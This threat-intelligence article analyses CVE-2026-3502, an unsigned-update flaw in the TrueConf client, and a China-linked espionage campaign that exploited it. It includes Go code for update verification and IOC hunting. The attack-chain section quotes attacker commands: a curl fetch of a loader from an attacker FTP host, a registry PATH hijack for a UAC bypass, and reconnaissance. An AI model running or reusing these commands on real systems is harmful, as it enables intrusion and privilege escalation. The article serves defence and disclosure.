
TrueConf zero-day turned trusted updates into a government espionage backdoor

By Artem Safonov, Threat Analyst
Cover © Anonhaven

CVE-2026-3502 (CVSS 7.8) is a zero-day in the TrueConf video conferencing client. The client downloads updates from its on-premises server without verifying integrity or authenticity. An attacker who controls the server can replace the update with an arbitrary executable.

Check Point Research discovered the flaw being exploited in the wild by a China-linked threat actor. The campaign, dubbed Operation TrueChaos, targeted government agencies in Southeast Asia through a single compromised server. The attacker delivered the Havoc C2 framework via weaponized updates. The flaw is patched in TrueConf 8.5.3 (build 884) and has been added to the CISA KEV catalog.

The product and its trust model

TrueConf is a video conferencing platform serving over 100,000 organisations globally. The platform is most widely used in Russia, with additional presence in East Asia, Europe, and the Americas. Government agencies, defence departments, critical infrastructure operators, and banks are among its customers.

The on-premises deployment model is TrueConf's core differentiator. The server runs entirely within a private LAN without requiring an internet connection. All traffic stays on-site, with offline activation for air-gapped environments. In enterprise deployments, the server manages client updates, creating a trust relationship that is the root of CVE-2026-3502.

The vulnerable code

When the TrueConf client starts, it checks the server for available updates by comparing versions. If the server has a newer build, the client prompts the user to download from:

https://{trueconf_server}/downlods/trueconf_client.exe

The URL maps to C:\Program Files\TrueConf Server\ClientInstFiles\ on the server. The typo ("downlods") is in the actual TrueConf code.

Classification: CWE-494 (Download of Code Without Integrity Check). The client performs no digital signature check and no hash validation: the file is downloaded, saved, and executed with the privileges of the updater process.

An attacker who controls the TrueConf server can replace trueconf_client.exe with any executable. Every connected client that accepts the update prompt runs the payload.

One server typically serves dozens of government agencies in an on-premises deployment. Compromising a single server turns the update mechanism into a malware distribution channel across the entire connected network. The attacker's reach scales with the server's client count.
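The control the client lacks, shown as an added example (my own code, not TrueConf's; the verification mechanism added in 8.5.3 is undocumented): a Go update verifier that authenticates a signed manifest with a vendor public key shipped inside the client, checks the installer's SHA-256 against the signed digest, and rejects any build that is not strictly newer than the installed one. The manifest format, the key handling and the SignUpdate helper are assumptions made for the demo; with this in place a compromised on-premises server can swap the installer bytes but cannot produce a signature the client accepts.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// Manifest is the signed description of one update. The format is this
// example's own; TrueConf's real 8.5.3 mechanism is not public.
type Manifest struct {
	Version int    `json:"version"` // build number; must increase monotonically
	SHA256  string `json:"sha256"`  // hex SHA-256 of the installer bytes
}

// Update is what the on-premises server hands the client: the manifest,
// the vendor's Ed25519 signature over it, and the installer itself.
type Update struct {
	ManifestJSON []byte
	Signature    []byte
	Installer    []byte
}

var (
	ErrBadSignature   = errors.New("manifest signature does not verify against the vendor key")
	ErrDigestMismatch = errors.New("installer digest does not match the signed manifest")
	ErrDowngrade      = errors.New("update is not newer than the installed build")
)

// VerifyUpdate is the control CWE-494 describes as missing. Nothing is
// written to disk or executed until the manifest authenticates under the
// vendor key the client ships with, the installer hashes to the signed
// digest, and the build number is strictly newer than the installed one
// (so a valid but older, buggy build cannot be replayed).
func VerifyUpdate(vendorKey ed25519.PublicKey, installed int, u Update) (Manifest, error) {
	var m Manifest
	if !ed25519.Verify(vendorKey, u.ManifestJSON, u.Signature) {
		return m, ErrBadSignature
	}
	if err := json.Unmarshal(u.ManifestJSON, &m); err != nil {
		return m, fmt.Errorf("manifest parse: %w", err)
	}
	want, err := hex.DecodeString(m.SHA256)
	if err != nil || len(want) != sha256.Size {
		return m, errors.New("manifest carries a malformed digest")
	}
	got := sha256.Sum256(u.Installer)
	if !bytes.Equal(got[:], want) {
		return m, ErrDigestMismatch
	}
	if m.Version <= installed {
		return m, ErrDowngrade
	}
	return m, nil
}

// SignUpdate models the vendor's offline release step. It exists only so the
// example is self-contained; in a real deployment the private key never
// reaches any server a customer operates.
func SignUpdate(vendorPriv ed25519.PrivateKey, version int, installer []byte) (Update, error) {
	sum := sha256.Sum256(installer)
	mj, err := json.Marshal(Manifest{Version: version, SHA256: hex.EncodeToString(sum[:])})
	if err != nil {
		return Update{}, err
	}
	return Update{ManifestJSON: mj, Signature: ed25519.Sign(vendorPriv, mj), Installer: installer}, nil
}

func main() {
	vendorPub, vendorPriv, _ := ed25519.GenerateKey(nil) // constructed vendor key pair
	genuine := []byte("constructed stand-in for trueconf_client.exe build 884")
	upd, _ := SignUpdate(vendorPriv, 884, genuine)

	_, err := VerifyUpdate(vendorPub, 883, upd)
	fmt.Println("genuine update:", err) // <nil>

	// The TrueChaos scenario: whoever controls the server replaces the installer bytes.
	swapped := upd
	swapped.Installer = []byte("weaponized Inno Setup installer")
	_, err = VerifyUpdate(vendorPub, 883, swapped)
	fmt.Println("swapped installer:", err) // digest mismatch; the file is never run
}
```

The signature covers the manifest rather than the installer directly so the client can check the version before downloading a large file, and the digest check binds the downloaded bytes to what was signed. Pinning the vendor key in the client is what removes the on-premises server from the trust chain; a key fetched from that same server would be no better than no check at all.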

Attack chain: Operation TrueChaos

Check Point Research published the full chain on March 31, 2026. The campaign targeted government entities in a Southeast Asian country.

Attackers gained control of the TrueConf on-premises server operated by a governmental IT department. This server provided video conferencing to dozens of agencies. The legitimate update was replaced with a weaponized Inno Setup installer. It upgraded clients from 8.5.1 to 8.5.2, the current version at the time, so the update appeared genuine.

When victims launched TrueConf, the client detected a "newer version" and prompted the update. No signature or integrity check stood in the way. The weaponized installer performed a real TrueConf upgrade while dropping two files to C:\ProgramData\PowerISO\:

C:\ProgramData\PowerISO\poweriso.exe  — legitimate PowerISO binary
C:\ProgramData\PowerISO\7z-x64.dll    — Havoc C2 implant

The benign poweriso.exe loaded the malicious 7z-x64.dll through DLL sideloading. The attacker then performed reconnaissance:

tasklist > cache
tracert 8.8.8.8 -h 5

A secondary loader was retrieved from an attacker-controlled FTP server:

curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o <path>
c:\program files\winrar\winrar.exe x update.7z -p <redacted>

The archive contained 7z.exe (legitimate) and iscsiexe.dll (malicious loader). The attacker used a UAC bypass via the Microsoft iSCSI Initiator Control Panel (iscsicpl.exe):

reg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\<user>\appdata\local\temp" /f
c:\windows\syswow64\iscsicpl.exe

iscsicpl.exe is a legitimate Windows binary that auto-elevates without a UAC prompt. It is vulnerable to DLL search-order hijacking for iscsiexe.dll. The attacker's DLL loaded in the elevated context, a documented LOLBAS technique.

The loader established persistence by keeping winexec.exe (the renamed poweriso.exe) running. Network communication went to attacker-controlled Havoc C2 servers.

The attack chain is a textbook supply chain compromise with a twist. The attacker did not poison the vendor's build pipeline. They compromised the customer's own on-premises server, the very infrastructure chosen because it keeps data within the organisation's perimeter. The trust model that makes TrueConf attractive for secure environments became the attack vector.

— Artem Safonov, Threat Analyst at AnonHaven

Attribution

Check Point Research assesses with moderate confidence that Operation TrueChaos is associated with a Chinese-nexus threat actor. TTPs match Chinese operations, including DLL sideloading and living-off-the-land binaries. C2 infrastructure sat on Alibaba Cloud and Tencent. Victimology aligned with Chinese strategic interests in Southeast Asia.

ShadowPad, a backdoor associated with multiple Chinese APT groups, targeted the same victim within the same timeframe. Check Point Research previously documented the Amaranth Dragon group using Havoc in espionage campaigns. Havoc plus ShadowPad against the same target suggests a multi-operator approach typical of China-aligned APT operations.

Indicators of compromise

From the Check Point Research report.

Files:

trueconf_windows_update.exe  — MD5: 22e32bcf113326e366ac480b077067cf
iscsiexe.dll                 — MD5: 9b435ad985b733b64a6d5f39080f4ae0
7z-x64.dll                   — MD5: 248a4d7d4c48478dcbeade8f7dba80b3

C2 infrastructure: 43.134.90[.]60, 43.134.52[.]221, 47.237.15[.]197 (FTP and Havoc C2).

Hunt for unsigned trueconf_windows_update.exe binaries. Check for C:\ProgramData\PowerISO\poweriso.exe on systems without PowerISO installed. Look for the registry persistence key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck pointing to PowerISO.

Suspicious process chains include trueconf.exe → trueconf_windows_update.exe → trueconf_windows_update.tmp → any child executable. Flag poweriso.exe spawning cmd.exe with curl or netstat commands.
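As an added example (my own code, not Check Point's or TrueConf's), a Go hunting script that applies the indicators above to Sysmon-style process-creation and registry events. It reconstructs parent lineage from PPID links to catch any executable spawned directly beneath the trueconf.exe → trueconf_windows_update.exe → trueconf_windows_update.tmp chain, flags poweriso.exe spawning cmd.exe with curl or netstat on the command line, flags poweriso.exe executing from C:\ProgramData\PowerISO, and flags a Run-key value named UpdateCheck whose data points at PowerISO. The JSON event layout, its field names and every sample event are constructed for the demo.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"path/filepath"
	"strings"
)

// Event is a constructed, Sysmon-like record (field names are this example's own); Type is "process" or "registry".
type Event struct {
	Type         string `json:"type"`
	PID          int    `json:"pid"`
	PPID         int    `json:"ppid"`
	Image        string `json:"image"`
	CommandLine  string `json:"cmdline"`
	TargetObject string `json:"target"`  // registry key path
	Details      string `json:"details"` // registry value data
}

// Finding names the rule that fired and the PID it fired on.
type Finding struct{ Rule string; PID int }

// updaterChain is the parent lineage the article flags, oldest first; any executable spawned directly beneath it is reported.
var updaterChain = []string{"trueconf.exe", "trueconf_windows_update.exe", "trueconf_windows_update.tmp"}

// SampleEvents are constructed for this example; PIDs, user paths and the FTP host are illustrative.
const SampleEvents = `
{"type":"process","pid":200,"ppid":100,"image":"C:\\Program Files\\TrueConf\\trueconf.exe","cmdline":"trueconf.exe"}
{"type":"process","pid":300,"ppid":200,"image":"C:\\Users\\u\\AppData\\Local\\Temp\\trueconf_windows_update.exe","cmdline":"trueconf_windows_update.exe"}
{"type":"process","pid":400,"ppid":300,"image":"C:\\Users\\u\\AppData\\Local\\Temp\\is-DEMO.tmp\\trueconf_windows_update.tmp","cmdline":"trueconf_windows_update.tmp"}
{"type":"process","pid":500,"ppid":400,"image":"C:\\ProgramData\\PowerISO\\poweriso.exe","cmdline":"poweriso.exe"}
{"type":"process","pid":600,"ppid":500,"image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c curl ftp://ftp.example.invalid/update.7z -o update.7z"}
{"type":"registry","pid":500,"ppid":400,"image":"C:\\ProgramData\\PowerISO\\poweriso.exe","target":"HKU\\S-1-5-21-0-0-0-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\UpdateCheck","details":"C:\\ProgramData\\PowerISO\\poweriso.exe"}
`

// base lowercases the file name of a Windows path so comparisons are case-insensitive.
func base(p string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, `/`)))
}

// lineage walks PPID links through process events seen so far, oldest ancestor first; bounded against PID-reuse cycles.
func lineage(pid int, byPID map[int]Event) []string {
	var chain []string
	for ev, ok := byPID[pid]; ok && len(chain) < 32; ev, ok = byPID[pid] {
		chain = append([]string{base(ev.Image)}, chain...)
		pid = ev.PPID
	}
	return chain
}

func check(ev Event, byPID map[int]Event) []Finding {
	var out []Finding
	img, cmd := base(ev.Image), strings.ToLower(ev.CommandLine)
	switch ev.Type {
	case "process":
		// Rule 1: the parent's lineage ends trueconf.exe -> trueconf_windows_update.exe -> trueconf_windows_update.tmp.
		if strings.HasSuffix(" "+strings.Join(lineage(ev.PPID, byPID), " "), " "+strings.Join(updaterChain, " ")) {
			out = append(out, Finding{"updater-chain-child", ev.PID})
		}
		// Rule 2: poweriso.exe spawning cmd.exe that runs curl or netstat.
		if base(byPID[ev.PPID].Image) == "poweriso.exe" && img == "cmd.exe" && (strings.Contains(cmd, "curl") || strings.Contains(cmd, "netstat")) {
			out = append(out, Finding{"poweriso-spawns-recon-cmd", ev.PID})
		}
		// Rule 3: PowerISO running from ProgramData; corroborate against the host's installed software.
		if strings.EqualFold(ev.Image, `C:\ProgramData\PowerISO\poweriso.exe`) {
			out = append(out, Finding{"poweriso-in-programdata", ev.PID})
		}
	case "registry":
		// Rule 4: a Run-key value named UpdateCheck whose data points at PowerISO.
		if strings.HasSuffix(strings.ToLower(ev.TargetObject), `\software\microsoft\windows\currentversion\run\updatecheck`) && strings.Contains(strings.ToLower(ev.Details), "poweriso") {
			out = append(out, Finding{"run-key-updatecheck-poweriso", ev.PID})
		}
	}
	return out
}

// Hunt parses one JSON event per line, tracks process lineage, and returns every rule hit in input order.
func Hunt(logLines string) []Finding {
	byPID := map[int]Event{}
	var findings []Finding
	sc := bufio.NewScanner(strings.NewReader(logLines))
	for sc.Scan() {
		var ev Event
		if line := strings.TrimSpace(sc.Text()); line == "" || json.Unmarshal([]byte(line), &ev) != nil {
			continue // blank or malformed line
		}
		if ev.Type == "process" {
			byPID[ev.PID] = ev
		}
		findings = append(findings, check(ev, byPID)...)
	}
	return findings
}

func main() {
	for _, f := range Hunt(SampleEvents) {
		fmt.Printf("%-28s pid=%d\n", f.Rule, f.PID)
	}
}
```

Rule 1 also fires on the installer children of a genuine update, so triage hits against the signed 8.5.3 build rather than treating them as confirmed compromise; Rule 3 needs a software-inventory cross-check, since PowerISO is a legitimate product that some hosts will have installed. Lineage is reconstructed from the events themselves rather than trusting a ParentImage field, which matters when the log source only records PIDs.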

Patch and response

Check Point Research responsibly disclosed CVE-2026-3502 to TrueConf. The fix is included in TrueConf 8.5.3 (build 884), released in March 2026. TrueConf is closed-source software, and the specific verification mechanism added in 8.5.3 has not been publicly documented.

CISA added CVE-2026-3502 to the Known Exploited Vulnerabilities catalog.

Warning

Update TrueConf to version 8.5.3 (build 884) on all endpoints. Audit server update files in C:\Program Files\TrueConf Server\ClientInstFiles\ for unsigned binaries. Hunt for IOCs from the Check Point report. If compromise indicators are found, isolate systems, preserve evidence, and rotate all accessible credentials. Hunt for ShadowPad indicators as well.

Context

The pattern has direct parallels to the TeamPCP supply chain campaign we covered this week. In both cases, attackers compromised a trusted update or distribution mechanism to reach downstream targets. The Trivy supply chain compromise poisoned a security scanner, while Operation TrueChaos poisoned a video conferencing updater. Different tools, same principle.

Many TrueConf deployments operate entirely on-premises and are invisible from the public internet. Check Point Research reviewed internet-exposed servers and found deployments concentrated in Russia, with presence in East Asia, Europe, and the Americas. The actual installed base is likely larger than scanning reveals.

The CVSS vector specifies Adjacent Network (AV:A), reflecting the requirement for server compromise or network position. Direct remote exploitation over the internet is not possible without first compromising the server.

Operation TrueChaos has direct parallels to SolarWinds, where attackers compromised an update mechanism to distribute malware downstream. Operation TrueChaos is scoped to individual deployments rather than the vendor's global supply chain. The per-organisation impact is equally devastating. Every endpoint connecting to the compromised server received the weaponized update.

CWE-494, no integrity check on downloaded code. This is not a subtle vulnerability. It is the absence of a basic security control in software deployed by government agencies and defence departments in air-gapped environments. The irony is sharp: the product was chosen for its security properties, and the update channel had none.

— Artem Safonov, Threat Analyst at AnonHaven


Questions on the topic

What is CVE-2026-3502?
A zero-day in TrueConf's update mechanism (CVSS 7.8) that lets an attacker controlling the on-premises server deliver arbitrary executables to all connected clients. Check Point Research found it exploited against Southeast Asian government agencies.